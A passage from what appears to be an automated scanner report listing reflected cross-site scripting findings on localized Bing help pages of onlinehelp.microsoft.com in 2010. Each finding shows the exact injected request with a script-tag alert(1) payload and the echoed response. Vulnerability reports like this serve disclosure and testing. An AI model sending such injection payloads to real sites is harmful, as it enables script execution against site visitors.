Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /hr-HR/bing/ff808535(hr-HR).aspx?bc463"><script>alert(1)</script>4afcc612db2=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:27 GMT
Content-Length: 38118


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/hr-hr/bing/ff808535.aspx?bc463"><script>alert(1)</script>4afcc612db2=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.38. http://onlinehelp.microsoft.com/hu-HU/bing/ff808535(hu-HU).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /hu-HU/bing/ff808535(hu-HU).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fc63"><script>alert(1)</script>4c421649388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /hu-HU/bing/ff808535(hu-HU).aspx?4fc63"><script>alert(1)</script>4c421649388=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:29 GMT
Content-Length: 38217


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/hu-hu/bing/ff808535.aspx?4fc63"><script>alert(1)</script>4c421649388=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.39. http://onlinehelp.microsoft.com/id-ID/bing/ff808535(id-ID).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /id-ID/bing/ff808535(id-ID).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f23bf"><script>alert(1)</script>0760acac702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /id-ID/bing/ff808535(id-ID).aspx?f23bf"><script>alert(1)</script>0760acac702=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:29 GMT
Content-Length: 44164


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/id-id/bing/ff808535(en-us).aspx?f23bf"><script>alert(1)</script>0760acac702=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.40. http://onlinehelp.microsoft.com/it-IT/bing/ff808535(it-IT).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /it-IT/bing/ff808535(it-IT).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3a74"><script>alert(1)</script>d85782753dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /it-IT/bing/ff808535(it-IT).aspx?c3a74"><script>alert(1)</script>d85782753dc=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:27 GMT
Content-Length: 38686


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Sommario%20della%20Guida%20di%20Bing&body=http://onlinehelp.microsoft.com/it-it/bing/ff808535.aspx?c3a74"><script>alert(1)</script>d85782753dc=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.41. http://onlinehelp.microsoft.com/ja-JP/bing/ff808535(ja-JP).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /ja-JP/bing/ff808535(ja-JP).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1892e"><script>alert(1)</script>d4919122dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ja-JP/bing/ff808535(ja-JP).aspx?1892e"><script>alert(1)</script>d4919122dc2=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:29 GMT
Content-Length: 39766


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/ja-jp/bing/ff808535.aspx?1892e"><script>alert(1)</script>d4919122dc2=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.42. http://onlinehelp.microsoft.com/ko-KR/bing/ff808535(ko-KR).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /ko-KR/bing/ff808535(ko-KR).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79834"><script>alert(1)</script>8cfaf6e9c9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ko-KR/bing/ff808535(ko-KR).aspx?79834"><script>alert(1)</script>8cfaf6e9c9a=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:16 GMT
Content-Length: 43619


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20%eb%8f%84%ec%9b%80%eb%a7%90&body=http://onlinehelp.microsoft.com/ko-kr/bing/ff808535.aspx?79834"><script>alert(1)</script>8cfaf6e9c9a=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.43. http://onlinehelp.microsoft.com/lt-LT/bing/ff808535(lt-LT).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /lt-LT/bing/ff808535(lt-LT).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2696a"><script>alert(1)</script>25ccfbbaa4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /lt-LT/bing/ff808535(lt-LT).aspx?2696a"><script>alert(1)</script>25ccfbbaa4a=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:30 GMT
Content-Length: 38134


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/lt-lt/bing/ff808535.aspx?2696a"><script>alert(1)</script>25ccfbbaa4a=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.44. http://onlinehelp.microsoft.com/lv-LV/bing/ff808535(lv-LV).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /lv-LV/bing/ff808535(lv-LV).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca09"><script>alert(1)</script>a35a25491d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /lv-LV/bing/ff808535(lv-LV).aspx?2ca09"><script>alert(1)</script>a35a25491d7=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:29 GMT
Content-Length: 38162


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/lv-lv/bing/ff808535.aspx?2ca09"><script>alert(1)</script>a35a25491d7=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.45. http://onlinehelp.microsoft.com/ms-MY/bing/ff808535(ms-MY).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /ms-MY/bing/ff808535(ms-MY).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84704"><script>alert(1)</script>356a2677de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ms-MY/bing/ff808535(ms-MY).aspx?84704"><script>alert(1)</script>356a2677de5=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:30 GMT
Content-Length: 44223


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/ms-my/bing/ff808535(en-us).aspx?84704"><script>alert(1)</script>356a2677de5=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.46. http://onlinehelp.microsoft.com/nb-NO/bing/ff808535(nb-NO).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /nb-NO/bing/ff808535(nb-NO).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccabf"><script>alert(1)</script>4bad707907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /nb-NO/bing/ff808535(nb-NO).aspx?ccabf"><script>alert(1)</script>4bad707907e=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:41 GMT
Content-Length: 37536


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/nb-no/bing/ff808535.aspx?ccabf"><script>alert(1)</script>4bad707907e=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.47. http://onlinehelp.microsoft.com/nl-BE/bing/ff808535(nl-BE).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /nl-BE/bing/ff808535(nl-BE).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfacd"><script>alert(1)</script>036302501aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /nl-BE/bing/ff808535(nl-BE).aspx?cfacd"><script>alert(1)</script>036302501aa=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:29 GMT
Content-Length: 39268


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/nl-be/bing/ff808535.aspx?cfacd"><script>alert(1)</script>036302501aa=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.48. http://onlinehelp.microsoft.com/nl-NL/bing/ff808535(nl-NL).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /nl-NL/bing/ff808535(nl-NL).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 104eb"><script>alert(1)</script>00322313678 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /nl-NL/bing/ff808535(nl-NL).aspx?104eb"><script>alert(1)</script>00322313678=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:28 GMT
Content-Length: 39270


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/nl-nl/bing/ff808535.aspx?104eb"><script>alert(1)</script>00322313678=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.49. http://onlinehelp.microsoft.com/pl-PL/bing/ff808535(pl-PL).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /pl-PL/bing/ff808535(pl-PL).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d468c"><script>alert(1)</script>db90f586c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pl-PL/bing/ff808535(pl-PL).aspx?d468c"><script>alert(1)</script>db90f586c9d=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:43 GMT
Content-Length: 38060


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/pl-pl/bing/ff808535.aspx?d468c"><script>alert(1)</script>db90f586c9d=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.50. http://onlinehelp.microsoft.com/pt-BR/bing/ff808535(pt-BR).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /pt-BR/bing/ff808535(pt-BR).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3b15"><script>alert(1)</script>634b6031403 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pt-BR/bing/ff808535(pt-BR).aspx?a3b15"><script>alert(1)</script>634b6031403=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:56 GMT
Content-Length: 38636


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/pt-br/bing/ff808535.aspx?a3b15"><script>alert(1)</script>634b6031403=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.51. http://onlinehelp.microsoft.com/pt-PT/bing/ff808535(pt-PT).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /pt-PT/bing/ff808535(pt-PT).aspx

Issue detail

